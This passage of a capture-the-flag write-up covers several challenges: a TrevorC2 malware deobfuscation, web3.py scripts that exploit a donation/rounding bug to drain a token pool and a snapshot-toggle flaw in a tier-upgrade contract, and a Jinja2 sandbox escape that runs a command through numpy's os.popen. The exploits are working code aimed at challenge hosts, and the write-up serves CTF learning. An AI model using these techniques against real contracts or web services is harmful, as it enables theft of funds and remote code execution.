    • Deobfuscated the 32 layers of zlib/base64 to find the TrevorC2 cipher key: aa34042ac9c17b459b93c0d49c7124ea.
  4. Command Recovery:
    • Decrypted the C2 commands hidden in HTML comments using the key.
    • Revealed the flag in the persistence command.
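
The layer-peeling in step 3 can be sketched as a loop. This is a simplified illustration: it assumes each layer is exactly base64 over zlib, and the inner payload is a made-up placeholder. In the real a.py, each layer's literal would likely have to be pulled out of its wrapper code first.

```python
import base64
import zlib

def peel(blob: bytes, max_layers: int = 64):
    """Undo base64+zlib layers until the data no longer decodes."""
    layers = 0
    while layers < max_layers:
        try:
            blob = zlib.decompress(base64.b64decode(blob, validate=True))
        except (ValueError, zlib.error):
            break  # not base64, or not zlib: innermost layer reached
        layers += 1
    return blob, layers

# Build a 32-layer test sample around a placeholder payload.
payload = b"print('inner agent')"
wrapped = payload
for _ in range(32):
    wrapped = base64.b64encode(zlib.compress(wrapped))

inner, count = peel(wrapped)
print(count, inner)
```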

Final Flag

C2C{r34C725h3Ll_f0r_7H3_W1n_8995bba8e58d}


Blockchain

Nexus

Challenge Overview

  • Category: Blockchain
  • Goal: Drain the contract.

Vulnerability Analysis

Integer Division Error: The essenceTocrystal function calculates (amount * totalCrystals) / amplitude(). By manipulating the amplitude (denominator) to be extremely large, the result rounds down to 0. This allows the Setup contract’s deposit to yield 0 crystals, diluting the pool for the attacker’s benefit.
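
The rounding effect is easy to check with integer arithmetic. In the sketch below, all amounts are hypothetical. It also assumes, as the solver's comments suggest, that a direct token transfer to the contract raises amplitude() without minting crystals.

```python
def essence_to_crystal(amount: int, total_crystals: int, amplitude: int) -> int:
    """Mirror of (amount * totalCrystals) / amplitude() with Solidity's floor division."""
    return (amount * total_crystals) // amplitude

total_crystals = 1                 # attacker attuned 1 wei first
amplitude = 1                      # backing for that single crystal

# Attacker transfers tokens directly, inflating the denominator only.
donation = 10**22                  # hypothetical amount
amplitude += donation

# Setup's later deposit is smaller than the amplitude, so it floors to zero.
setup_deposit = 10**21             # hypothetical amount
minted = essence_to_crystal(setup_deposit, total_crystals, amplitude)
print(minted)
```

Any deposit smaller than amplitude / totalCrystals mints nothing, so the depositor's tokens enter the pool while the attacker still holds the only crystal.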

import os
import json
from web3 import Web3

RPC_URL = "http://challenges.1pc.tf:31123/a8a74bd2-c60f-461e-b871-3198a00fc2c0"
PLAYER_KEY = "3e79ccbcb0458f37cb34901d21bf6e7c715c048c30deb42f20168719dca99074"
SETUP_ADDR = "0x9F61B1268902DB0372E9ae29387B4D4aBAb428B2"
WALLET_ADDR = "0x45BCfa7E902D44BB17052997aBd01Db3C4e3BEb8"
# Minimal ABIs
SETUP_ABI = [
    {"inputs":[],"name":"nexus","outputs":[{"internalType":"contract CrystalNexus","name":"","type":"address"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"essence","outputs":[{"internalType":"contract Essence","name":"","type":"address"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"conductRituals","outputs":[],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}
]

NEXUS_ABI = [
    {"inputs":[{"internalType":"uint256","name":"essenceAmount","type":"uint256"}],"name":"attune","outputs":[{"internalType":"uint256","name":"crystals","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[{"internalType":"uint256","name":"crystalAmount","type":"uint256"},{"internalType":"address","name":"recipient","type":"address"}],"name":"dissolve","outputs":[{"internalType":"uint256","name":"essenceOut","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[],"name":"totalCrystals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"crystalBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"amplitude","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}
]

ESSENCE_ABI = [
    {"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}
]

def main():
    w3 = Web3(Web3.HTTPProvider(RPC_URL))
    if not w3.is_connected():
        print("Failed to connect to RPC")
        return

    print(f"Connected to {RPC_URL}")
    
    account = w3.eth.account.from_key(PLAYER_KEY)
    print(f"Player Address: {account.address}")

    setup = w3.eth.contract(address=SETUP_ADDR, abi=SETUP_ABI)
    nexus_addr = setup.functions.nexus().call()
    essence_addr = setup.functions.essence().call()
    
    nexus = w3.eth.contract(address=nexus_addr, abi=NEXUS_ABI)
    essence = w3.eth.contract(address=essence_addr, abi=ESSENCE_ABI)
    
    print(f"Nexus: {nexus_addr}")
    print(f"Essence: {essence_addr}")

    # Step 0: Approve Essence for Nexus
    print("Approving Nexus to spend Essence...")
    nonce = w3.eth.get_transaction_count(account.address)
    
    tx = essence.functions.approve(nexus_addr, 2**256 - 1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 100000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Approved.")
    nonce += 1

    # Step 1: Attune 1 wei
    print("Attuning 1 wei...")
    tx = nexus.functions.attune(1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Attuned 1 wei.")
    nonce += 1

    # Check state
    total = nexus.functions.totalCrystals().call()
    print(f"Total Crystals: {total}")

    # Step 1.5: Transfer the REMAINING Essence balance directly to Nexus to spike Amplitude.
    # The pool grows but the crystal supply does not, so Setup gets 0 crystals when it attunes.
    bal = essence.functions.balanceOf(account.address).call()
    print(f"Transferring {bal} wei to Nexus...")
    tx = essence.functions.transfer(nexus_addr, bal).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Transferred essence.")
    nonce += 1
    
    # Verify Amplitude
    amp = nexus.functions.amplitude().call()
    print(f"Current Amplitude: {amp}")

    # Step 2: Call conductRituals
    print("Calling conductRituals on Setup...")
    tx = setup.functions.conductRituals().build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 500000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Rituals conducted.")
    nonce += 1

    # Check state again
    total = nexus.functions.totalCrystals().call()
    print(f"Total Crystals after rituals: {total}")
    # Setup should have failed to get crystals if exploit worked
    
    
    # Step 3: Dissolve our 1 crystal
    # We should hold 1 crystal, which owns the ENTIRE pot
    my_crystals = nexus.functions.crystalBalance(account.address).call()
    print(f"My Crystals: {my_crystals}")
    
    if my_crystals > 0:
        print(f"Dissolving {my_crystals} crystals (Round 1)...")
        tx = nexus.functions.dissolve(my_crystals, account.address).build_transaction({
            'from': account.address,
            'nonce': nonce,
            'gas': 200000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
        w3.eth.wait_for_transaction_receipt(tx_hash)
        print("Dissolved Round 1.")
        nonce += 1

    # Check state
    total = nexus.functions.totalCrystals().call()
    amp = nexus.functions.amplitude().call()
    print(f"Total Crystals: {total}")
    print(f"Amplitude (Leftover Friction): {w3.from_wei(amp, 'ether')}")

    # Step 4: Re-enter to claim friction
    # Total crystals is 0 again, so we can buy in at 1:1
    print("Attuning 1 wei (Round 2)...")
    tx = nexus.functions.attune(1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Attuned 1 wei.")
    nonce += 1

    # Step 5: Dissolve again
    my_crystals = nexus.functions.crystalBalance(account.address).call()
    if my_crystals > 0:
        print(f"Dissolving {my_crystals} crystals (Round 2)...")
        tx = nexus.functions.dissolve(my_crystals, account.address).build_transaction({
            'from': account.address,
            'nonce': nonce,
            'gas': 200000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
        w3.eth.wait_for_transaction_receipt(tx_hash)
        print("Dissolved Round 2.")
        nonce += 1

    # Verify Solved
    is_solved = setup.functions.isSolved().call()
    final_balance = essence.functions.balanceOf(account.address).call()
    print(f"Final Essence Balance: {w3.from_wei(final_balance, 'ether')}")
    print(f"isSolved: {is_solved}")

if __name__ == "__main__":
    main()
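
The arithmetic behind the donation step can be sketched offline. This is a minimal model, not the Nexus contract: it assumes the usual share rule (1:1 for the first depositor, then `amount * totalCrystals / amplitude` rounded down), it ignores the friction fee, and the 10 and 5 token amounts are made-up values for illustration.

```python
ETHER = 10**18


def mint_crystals(amount: int, total_crystals: int, pool_balance: int) -> int:
    """Assumed mint rule: 1:1 for the first deposit, floored pro-rata afterwards."""
    if total_crystals == 0:
        return amount
    return amount * total_crystals // pool_balance


def simulate(donation: int, victim_deposit: int) -> dict:
    pool, total = 0, 0

    # Attacker attunes 1 wei and receives 1 crystal.
    attacker = mint_crystals(1, total, pool)
    pool, total = pool + 1, total + attacker

    # Direct token transfer: the pool grows, the crystal supply does not.
    pool += donation

    # Victim deposits; the floored division decides how many crystals it gets.
    victim = mint_crystals(victim_deposit, total, pool)
    pool, total = pool + victim_deposit, total + victim

    # Attacker redeems its crystals for a pro-rata share of the pool.
    attacker_payout = pool * attacker // total
    return {"victim_crystals": victim, "attacker_payout": attacker_payout}


result = simulate(donation=10 * ETHER, victim_deposit=5 * ETHER)
print(result)
```

With a donation larger than the victim's deposit, the victim's crystals round down to 0 and the single attacker crystal redeems the whole pool, which is the state the script checks for after conductRituals.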

Final Flag

C2C{the_essence_of_nexus_is_donation_hahahaha}

TGE

Challenge Overview

  • Category: Blockchain
  • Goal: Bypass snapshot logic to upgrade token tier.

Vulnerability Analysis

Logical Flaw: The setTgePeriod function lets the player toggle the TGE state (the solve script reaches it through enableTge on the Setup contract). Disabling it (false) triggers a one-time "snapshot" while the Tier 2 and Tier 3 supply, and the attacker's balance in those tiers, is still 0. Re-enabling it makes mints count toward the pre-TGE balance again, so tokens minted after the snapshot are compared against the (empty) snapshot and the upgrade check passes.
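
To make the toggle easier to follow, here is a toy Python model of the snapshot logic. It is inferred from the comments in the solve script, not taken from the contract source: the field names mirror preTGESupply, preTGEBalance, isTgePeriod and tgeActivated, while the one-token-per-tier accounting and the `require` helper are simplifying assumptions.

```python
def require(condition: bool, message: str) -> None:
    """Hypothetical stand-in for Solidity's require()."""
    if not condition:
        raise ValueError(message)


class ToyTGE:
    def __init__(self):
        self.is_tge_period = True
        self.tge_activated = False
        self.supply = {1: 0, 2: 0, 3: 0}          # live supply per tier
        self.pre_tge_supply = {1: 0, 2: 0, 3: 0}  # one-time snapshot
        self.balance = {}                         # (user, tier) -> live balance
        self.pre_tge_balance = {}                 # (user, tier) -> tracked balance

    def set_tge_period(self, enabled: bool) -> None:
        # Assumed: only the first disable takes the snapshot.
        if not enabled and not self.tge_activated:
            self.tge_activated = True
            self.pre_tge_supply = dict(self.supply)
        self.is_tge_period = enabled

    def _mint(self, user: str, tier: int) -> None:
        self.supply[tier] += 1
        self.balance[(user, tier)] = self.balance.get((user, tier), 0) + 1
        if self.is_tge_period:
            # Tracked balance only moves while the TGE period is on.
            key = (user, tier)
            self.pre_tge_balance[key] = self.pre_tge_balance.get(key, 0) + 1

    def buy(self, user: str) -> None:
        require(self.is_tge_period, "TGE closed")
        self._mint(user, 1)

    def upgrade(self, user: str, tier: int) -> None:
        require(self.tge_activated, "no snapshot yet")
        require(self.balance.get((user, tier - 1), 0) > 0, "missing lower tier")
        self.balance[(user, tier - 1)] -= 1
        self.supply[tier - 1] -= 1
        self._mint(user, tier)
        tracked = self.pre_tge_balance.get((user, tier), 0)
        require(tracked > self.pre_tge_supply[tier], "not eligible")


tge = ToyTGE()
tge.buy("player")
tge.set_tge_period(False)  # snapshot: Tier 2 and Tier 3 supply recorded as 0
tge.set_tge_period(True)   # mints update pre_tge_balance again
tge.upgrade("player", 2)
tge.upgrade("player", 3)
print(tge.balance[("player", 3)])
```

In this model, skipping the re-enable makes the upgrade fail, because the mint no longer touches the tracked balance and 0 is not greater than the snapshotted 0.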

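import sys
from web3 import Web3
# Written against web3.py v6: v7 renamed geth_poa_middleware to ExtraDataToPOAMiddleware
# and signed_tx.rawTransaction to raw_transaction.
from web3.middleware import geth_poa_middleware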

# Configuration
RPC_URL = "http://challenges.1pc.tf:45975/df3dd25c-dcc4-4809-8fe6-67bd5101da75"
PRIVATE_KEY = "0650cbd94d509195678850932a60305d68da8b5fb5852ca889ac9e2e1c0a93c9"
SETUP_ADDRESS = "0x2C0bce02bc40050B605734ad828e92DF5C66829D"
PLAYER_ADDRESS = "0x2A2b61560dec956aaf6B89D2aC7A5ff608F66EE5"
# Minimal ABIs
SETUP_ABI = [
    {"inputs": [], "name": "tge", "outputs": [{"internalType": "contract TGE", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"},
    {"inputs": [], "name": "token", "outputs": [{"internalType": "contract Token", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"},
    {"inputs": [{"internalType": "bool", "name": "_tge", "type": "bool"}], "name": "enableTge", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [], "name": "isSolved", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "view", "type": "function"}
]

TGE_ABI = [
    {"inputs": [], "name": "buy", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [{"internalType": "uint256", "name": "tier", "type": "uint256"}], "name": "upgrade", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [], "name": "owner", "outputs": [{"internalType": "address", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"}
]

TOKEN_ABI = [
    {"inputs": [{"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}], "name": "approve", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function"}
]

def main():
    w3 = Web3(Web3.HTTPProvider(RPC_URL))
    w3.middleware_onion.inject(geth_poa_middleware, layer=0)

    if not w3.is_connected():
        print("Failed to connect to RPC")
        return

    account = w3.eth.account.from_key(PRIVATE_KEY)
    print(f"Connected as {account.address}")
    
    setup_contract = w3.eth.contract(address=SETUP_ADDRESS, abi=SETUP_ABI)
    
    # Get contracts
    tge_addr = setup_contract.functions.tge().call()
    token_addr = setup_contract.functions.token().call()
    print(f"TGE Address: {tge_addr}")
    print(f"Token Address: {token_addr}")

    tge_contract = w3.eth.contract(address=tge_addr, abi=TGE_ABI)
    token_contract = w3.eth.contract(address=token_addr, abi=TOKEN_ABI)

    def send_tx(func):
        tx = func.build_transaction({
            'from': account.address,
            'nonce': w3.eth.get_transaction_count(account.address),
            'gas': 2000000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, private_key=PRIVATE_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
        receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
        if receipt.status == 1:
            print(f"Transaction successful: {func.fn_name}")
        else:
            print(f"Transaction failed: {func.fn_name}")
            sys.exit(1)
            
    # Step 1: Approve TGE to spend tokens (15 tokens required for Tier 1)
    print("Approving tokens...")
    send_tx(token_contract.functions.approve(tge_addr, 15))

    # Step 2: Buy Tier 1
    print("Buying Tier 1...")
    send_tx(tge_contract.functions.buy())

    # Step 3: Disable TGE to trigger snapshot
    # This sets isTgePeriod=false, but first sets tgeActivated=true and snapshots supply (TIER_2 supply is 0)
    print("Disabling TGE to snapshot supply...")
    send_tx(setup_contract.functions.enableTge(False))

    # Step 4: Re-enable TGE
    print("Re-enabling TGE...")
    send_tx(setup_contract.functions.enableTge(True))

    # Step 5: Upgrade to Tier 2
    # Requirement: preTGEBalance[msg.sender][2] > preTGESupply[2] (which is 0)
    # _mint updates preTGEBalance if isTgePeriod=true
    print("Upgrading to Tier 2...")
    send_tx(tge_contract.functions.upgrade(2))

    # Step 6: Upgrade to Tier 3
    # Requirement: preTGEBalance[msg.sender][3] > preTGESupply[3] (which is 0)
    print("Upgrading to Tier 3...")
    send_tx(tge_contract.functions.upgrade(3))

    # Verification
    is_solved = setup_contract.functions.isSolved().call()
    print(f"Is Solved: {is_solved}")

if __name__ == "__main__":
    main()

Final Flag

C2C{just_a_warmup_from_someone_who_barely_warms_up}


Misc

Jin

Challenge Overview

  • Category: Misc
  • Goal: Escape the Jinja2 sandbox.

Vulnerability Analysis

The sandbox blocks typical keywords but exposes numpy, and string concatenation via ~ is allowed. Exploit: build the command string (here /fix help) piece by piece by slicing characters out of the string representations of numpy objects (e.g., numpy.fix, numpy.typing) and concatenating them, then pass the result to numpy.f2py.os.popen to execute it and read the flag.
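
The slicing trick can be tried locally without the sandbox. In this sketch `blob` is a made-up stand-in for what `numpy.fix~numpy.typing~dict(help=1)` renders to (the address and install path are invented), `slice_expr` is a hypothetical helper, and Python's `+` replaces Jinja2's `~` when the expression is evaluated.

```python
# Stand-ins for str(numpy.fix), str(numpy.typing) and str(dict(help=1)).
blob = (
    "<function fix at 0x7f0000000000>"
    "<module 'numpy.typing' from "
    "'/usr/lib/python3/site-packages/numpy/typing/__init__.py'>"
    "{'help': 1}"
)


def slice_expr(text: str, needle: str, var: str = "x") -> str:
    """Build an index-only expression such as x[10:14] that spells needle."""
    start = text.index(needle)
    return f"{var}[{start}:{start + len(needle)}]"


# The expression contains only a variable name, digits, brackets, colons and
# the concatenation operator, so no filtered keyword appears in it.
expr = "~".join(slice_expr(blob, needle) for needle in ("/", "fix ", "help"))
print(expr)

# Evaluate it outside Jinja2 by swapping ~ for Python's string concatenation.
command = eval(expr.replace("~", "+"), {"x": blob})
print(command)
```

The offsets depend on the exact rendered string, which is why the solve script first asks the server to print `x` and only then computes the indices.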

# pwntools solve script for app.py
from pwn import *

HOST = 'challenges.1pc.tf'
PORT = 37429

# Stage 1: render the concatenated string so we can look up character offsets in it
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
content = b"""{%set x= numpy.fix~numpy.typing~dict(help=1)%}{{x}}"""
p.sendline(content)
result = p.recvline().decode()
print(result)
p.close()

# Stage 2: slice "/", "fix " and "help" out of x by index and run the result with popen
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
payload = f"x[{result.index('/')}]~x[{result.index('fix ')}:{result.index('fix ')+4}]~x[{result.index('help')}:{result.index('help')+4}]"

content = b"{%set x= numpy.fix~numpy.typing~dict(help=1)%}{{numpy.f2py.os.popen("+payload.encode()+b").read()}}"
print(content)
p.sendline(content)
print(p.recvline().decode())

Final Flag

C2C{damnnn_i_love_numpy_6447e4b64e5e}